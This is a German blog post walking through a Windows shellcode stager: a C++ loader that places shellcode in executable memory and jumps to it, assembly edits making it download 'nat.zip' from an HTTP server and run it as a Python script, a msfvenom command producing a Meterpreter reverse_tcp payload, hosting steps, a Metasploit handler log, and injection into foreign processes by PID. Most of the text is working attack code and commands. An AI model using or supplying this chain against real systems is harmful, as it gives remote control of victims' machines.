In der Regel werden Shellcode Injections dazu benutzt, eine Reverse Shell zu initiieren. Jedoch kann es unter manchen Umständen nötig sein, den Code für die Shell erst im zweiten Schritt zu laden.
In diesem Blogpost zeige ich, wie wir eine Shellcode Injection nutzen können, um eine Datei mittels HTTP zu laden und anschließend auszuführen.
Als erstes brauchen wir ein kleines Programm, welches den Shellcode in den Speicher lädt und anschließend in diesen hineinspringt.
... //buf ist der Shellcode unsigned char buf[] = "\xeb\x74\x31\...\x69\x70\x00"; int main(int argc, char** argv) { ... //Speicherbereich adressieren void* stage = VirtualAlloc(0, 0x1000, 0x1000, 0x40); void (*target)(); ... //Shellcode in den Speicher verschieben memmove(stage, buf, 0x1000); ... //Verschiebe die Shellcode Adresse nach eax und springe dorthin __asm { mov eax, target jmp eax } }
Den kompletten Code findet Ihr im Repository.
Einen gut dokumentierten Assembler Code finden wir im Repository von Stephen Bradshaw.
Der Code führt eine heruntergeladene VBS Datei aus. Wir wollen jedoch ein Python Script starten, welches eine Meterpreter Shell erzeugt. Hierzu ändern wir folgende Stellen:
;Zeile 143 / +7 markiert den Anfang des Dateinamens (WindowsAgent.py) lea edx, [esi + 7] ;Zeile 184 / Befehlszeile, die ausgeführt werden soll db "python WindowsAgent.py", 0 ;Zeile 192 / Unsere URL db "http://172.26.72.38/nat.zip", 0
Den Shellcode müssen wir als x86 Windows
Binärdatei ausgeben. Dies machen wir mit nasm
:
nasm -f win32 download.asm -o shellcode.o
Das Binary lassen wir uns nun C++
freundlich anzeigen:
objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Die Ausgabe nutzen wir als Shellcode in unserem C++
Code und kompilieren unser Projekt.
Um den Shellcode zu verstehen, debuggen wir anschließend das Programm. Wir suchen den Aufruf der Funktion main()
Von main()
aus suchen wir den Sprung in den Shellcode Speicherbereich. In unserem Programm haben wir diesen mit Inline Assembly realisiert: call eax
. Dies sieht im Debugger so aus:
Springen wir nun rein, sehen wir unseren Shellcode:
Von hier aus können wir die Prozeduren verstehen und testen.
Wie Eingangs erwähnt, wollen wir eine Meterpreter Shell mittels Python erzeugen. Also benötigen wir einen entsprechenden Payload. Diesen erzeugen wir uns mit msfvenom
.
msfvenom -p python/meterpreter/reverse_tcp LHOST=172.26.72.38 LPORT=4500 > payload.py
Der Shellcode lädt die Datei nat.zip
von einem HTTP Server herunter, speichert diese als WindowsAgent.py
und führt sie dann aus. Also bereiten wir dies entsprechend vor:
cp payload.py nat.zip python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Zu guter Letzt benötigen wir noch einen Metasploit Handler, welcher unsere Shell entgegen nimmt. Dieser kann über das Script nosoc3.rc
gestartet werden:
msf6 > resource nosoc3.rc [*] Processing /home/kali/nosoc3.rc for ERB directives. resource (/home/kali/nosoc3.rc)> use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp resource (/home/kali/nosoc3.rc)> set payload python/meterpreter/reverse_tcp payload => python/meterpreter/reverse_tcp resource (/home/kali/nosoc3.rc)> set lhost 0.0.0.0 lhost => 0.0.0.0 resource (/home/kali/nosoc3.rc)> set lport 4500 lport => 4500 resource (/home/kali/nosoc3.rc)> run [*] Started reverse TCP handler on 0.0.0.0:4500
Nun ist alles bereit.
Starten wir nun das Programm auf dem Ziel PC.
Das Python Script wird heruntergeladen:
Und schließlich werden wir von einer Meterpreter Shell begrüßt:
Wir können den Shellcode natürlich auch in fremde Prozesse injizieren. Ein Beispielprogramm hierzu gibt es auch im Repository. Zum Starten muss die Ziel PID als Argument übergeben werden:
RemoteInject.exe 10001
git clone https://github.com/psycore8/nosoc-shellcode